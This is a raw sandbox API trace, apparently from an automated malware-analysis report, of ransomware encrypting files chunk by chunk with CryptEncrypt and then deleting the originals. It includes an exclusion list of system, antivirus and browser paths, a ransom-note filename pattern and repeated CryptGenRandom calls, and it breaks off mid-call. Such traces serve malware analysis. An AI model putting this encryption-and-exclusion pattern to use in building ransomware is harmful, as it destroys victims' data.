[0156.882] GetLastError () returned 0x0 [0156.882] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.883] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.883] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.884] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.884] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.884] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.884] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.884] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.884] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.884] GetLastError () returned 0x0 [0156.884] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.885] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.885] GetLastError () returned 0x0 [0156.885] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.885] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.885] GetLastError () returned 0x0 [0156.885] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.885] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.885] GetLastError () returned 0x0 [0156.885] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.885] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.885] GetLastError () returned 0x0 [0156.885] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.885] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.885] GetLastError () returned 0x0 [0156.885] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.885] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0xc4, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xc4, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xd0) returned 1 [0156.885] GetLastError () returned 0x0 [0156.885] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xd0, lpOverlapped=0x0) returned 1 [0156.886] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.886] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.886] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0156.886] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml", dwFileAttributes=0x20) returned 0 [0156.886] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 1 [0156.886] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0 [0156.886] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" [0156.886] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0156.886] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD804.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd804.tmp")) returned 0xd804 [0156.887] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD804.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd804.tmp"), dwFlags=0x1) returned 0 [0156.887] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD804.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd804.tmp")) returned 1 [0156.888] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0156.888] wcslen (_String="OK") returned 0x2 [0156.888] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.888] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.888] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0156.888] CryptDestroyHash (hHash=0x9ad638) returned 1 [0156.888] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0156.888] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*NMCRYPT") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*Recovers your files.html") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.exe") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.dll") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.lnk") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.bat") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.ini") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.msi") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*.scf") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*pagefile.sys*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*AppData*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\winrar\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\java\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\windows\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\ESET\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\AVG\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*Atheros*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*Realtek*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*bootmgr*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*boot*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*boot*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*IO.SYS*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*ntldr*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*chrome*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*opera*") returned 0 [0156.888] PathMatchSpecW (pszFile="base_ca.xml", pszSpec="*firefox*") returned 0 [0156.889] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml", pszSpec="*") returned 1 [0156.889] strlen (_Str="NMoreira") returned 0x8 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.889] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, 